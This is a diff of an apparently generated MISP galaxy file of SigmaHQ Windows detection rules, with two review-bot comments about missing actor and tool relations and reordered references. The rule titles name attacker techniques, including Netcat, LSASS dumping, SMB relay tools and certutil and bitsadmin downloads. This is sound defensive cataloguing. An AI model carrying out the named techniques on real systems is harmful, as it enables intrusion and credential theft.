"logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://www.echotrail.io/insights/search/defaultpack.exe", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml" ], "tags": [ @@ -34857,6 +44519,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b2309017-4235-44fe-b5af-b15363011957", "value": "Lolbin Defaultpack.exe Use As Proxy" }, 
@@ -34874,10 +44545,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", - "https://twitter.com/gN3mes1s/status/1206874118282448897", "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/", + "https://twitter.com/gN3mes1s/status/1206874118282448897", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml" ], "tags": [ @@ -34885,6 +44556,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "value": "Suspicious Csc.exe Source File Folder" }, @@ -34909,6 +44589,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "value": "Suspicious Execution of InstallUtil To Download" }, @@ -34934,6 +44623,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "value": "Inveigh Hack Tool" }, 
@@ -34961,6 +44659,22 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18739897-21b1-41da-8ee4-5b786915a676", "value": "GALLIUM Artefacts" }, @@ -34986,6 +44700,15 @@ "attack.g0069" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", "value": "MERCURY Command Line Patterns" }, @@ -35010,6 +44733,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "value": "Suspicious Diantz Alternate Data Stream Execution" }, @@ -35035,6 +44767,15 @@ "attack.t1204.002" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d", "value": "Microsoft Outlook Product Spawning Windows Shell" }, @@ -35060,6 +44801,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "value": "UAC Bypass Tool UACMe Akagi" }, 
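Review bot: In the `@@ -34986,6 +44700,15 @@` hunk, `MERCURY Command Line Patterns` is tagged `attack.g0069` but the only `related` entry added points at `970a3432-3237-47ad-bcca-7d8cbb217736`, the same UUID every `attack.t1059.001` rule in this chunk receives, so it presumably resolves a technique tag above the visible tail; no relation to the group is emitted, and the same holds for `attack.g0096` on `Suspicious Certutil Command Usage` and `attack.s0111` on `Defrag Deactivation` further down. If the generator only resolves `attack.tNNNN` tags, say so in the galaxy description, because consumers will expect rule-to-actor and rule-to-tool pivots from those tags; otherwise add the intrusion-set and tool UUIDs as additional `related-to` entries. Every relation is also stamped `likelihood-probability="almost-certain"`; that is defensible when the tag comes straight from the rule author, but it should be stated so the value is not mistaken for an analyst judgement.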
@@ -35086,6 +44836,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher" }, @@ -35110,6 +44869,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", "value": "Suspicious Execution of Taskkill" }, @@ -35158,6 +44926,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "value": "HandleKatz LSASS Dumper Usage" }, @@ -35174,11 +44951,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", - "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", "https://twitter.com/egre55/status/1087685529016193025", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" ], "tags": [ 
@@ -35195,6 +44972,22 @@ "attack.g0096" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", "value": "Suspicious Certutil Command Usage" }, @@ -35211,8 +45004,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" ], "tags": [ @@ -35268,6 +45061,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afe52666-401e-4a02-b4ff-5d128990b8cb", "value": "RAR Greedy Compression" }, @@ -35284,8 +45086,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" ], "tags": [ 
@@ -35293,6 +45095,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "value": "Suspicious Schtasks Schedule Type With High Privileges" }, @@ -35318,6 +45129,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" }, @@ -35334,8 +45154,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" ], "tags": [ @@ -35345,6 +45165,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", "value": "Windows Defender Download Activity" }, 
@@ -35372,6 +45208,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", "value": "Empire PowerShell UAC Bypass" }, @@ -35396,6 +45241,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "value": "Suspicious CMD Shell Redirect" }, @@ -35412,10 +45266,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ @@ -35426,6 +45280,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "value": "Bitsadmin Download to Uncommon Target Folder" }, 
@@ -35518,8 +45388,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files", - "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml" ], "tags": [ @@ -35552,6 +45422,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", "value": "Use of Scriptrunner.exe" }, @@ -35568,8 +45447,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" ], "tags": [ @@ -35577,6 +45456,15 @@ "attack.t1003.005" ] }, + "related": [ + { + "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "value": "Cmdkey Cached Credentials Recon" }, 
@@ -35593,10 +45481,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" ], "tags": [ @@ -35607,6 +45495,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac", "value": "Bitsadmin Download to Suspicious Target Folder" }, @@ -35631,6 +45535,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", "value": "Suspicious File Download via CertOC.exe" }, 
@@ -35647,12 +45560,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://attack.mitre.org/techniques/T1557/001/", - "https://github.com/ohpe/juicy-potato", "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://github.com/ohpe/juicy-potato", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" ], "tags": [ @@ -35660,6 +45572,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", "value": "SMB Relay Attack Tools" }, @@ -35685,6 +45606,15 @@ "attack.s0111" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "958d81aa-8566-4cea-a565-59ccd4df27b0", "value": "Defrag Deactivation" }, @@ -35711,6 +45641,15 @@ "attack.t1095" ] }, + "related": [ + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "value": "Netcat Suspicious Execution" }, 
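Review bot: The `@@ -35647,12 +45560,11 @@` hunk for `SMB Relay Attack Tools` silently drops `https://attack.mitre.org/techniques/T1557/001/` from `refs` (twelve lines become eleven) while the other references are merely reordered, and nothing in the commit explains why. If the upstream `proc_creation_win_tools_relay_attacks.yml` still lists it, the generator is losing a reference; if upstream removed it, the new `related` entry to `650c784b-7504-4df7-ab2c-4ea882384d1e` becomes the only link to that technique and should be kept in sync. Nearly every other `refs` list in this chunk (certutil, bitsadmin, cli_escape) shows the same pure-reorder churn, which suggests references are emitted from an unordered collection; sorting them, or preserving upstream order, would make regenerations reviewable and make a genuine drop like this one stand out.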
@@ -35735,6 +45674,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a4824fca-976f-4964-b334-0621379e84c4", "value": "Sysinternals SDelete Delete File" }, @@ -35751,9 +45699,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" ], "tags": [ @@ -35781,8 +45729,8 @@ "refs": [ "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" ], "tags": [ 
@@ -35790,6 +45738,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "value": "Empire PowerShell Launch Parameters" }, @@ -35832,8 +45789,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" ], @@ -35844,6 +45801,15 @@ "attack.t1087.002" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "value": "Suspicious Use of PsLogList" }, @@ -35860,9 +45826,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" ], "tags": [ 
@@ -35870,6 +45836,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", "value": "Use Short Name Path in Command Line" }, @@ -35894,6 +45869,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", "value": "Use of UltraViewer Remote Access Software" }, @@ -35918,6 +45902,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003", "value": "Read and Execute a File Via Cmd.exe" }, @@ -35934,9 +45927,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml" ], "tags": [ 
@@ -35947,6 +45940,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "value": "Bitsadmin Download File with Suspicious Extension" }, @@ -35971,6 +45980,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", "value": "WMIC Service Start/Stop" }, @@ -35995,6 +46013,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "value": "Suspicious Invoke-WebRequest Usage" }, @@ -36045,6 +46072,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "value": "Netsh Firewall Rule Deletion" }, 
@@ -36061,11 +46097,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://twitter.com/vysecurity/status/885545634958385153", - "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", - "https://twitter.com/Hexacorn/status/885570278637678592", "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" ], "tags": [ @@ -36073,6 +46109,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "value": "Suspicious Commandline Escape" }, @@ -36098,6 +46143,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "value": "Download Arbitrary Files Via PresentationHost.exe" }, 
@@ -36160,8 +46214,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml" ], "tags": [ @@ -36193,6 +46247,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "value": "Net.exe User Account Creation - Never Expire" }, @@ -36233,6 +46296,7 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" ], "tags": [ @@ -36241,6 +46305,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", "value": "Monitoring Winget For LOLbin Execution" }, @@ -36289,6 +46362,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "value": "MSDT.EXE Execution With Suspicious Cab Option" }, 
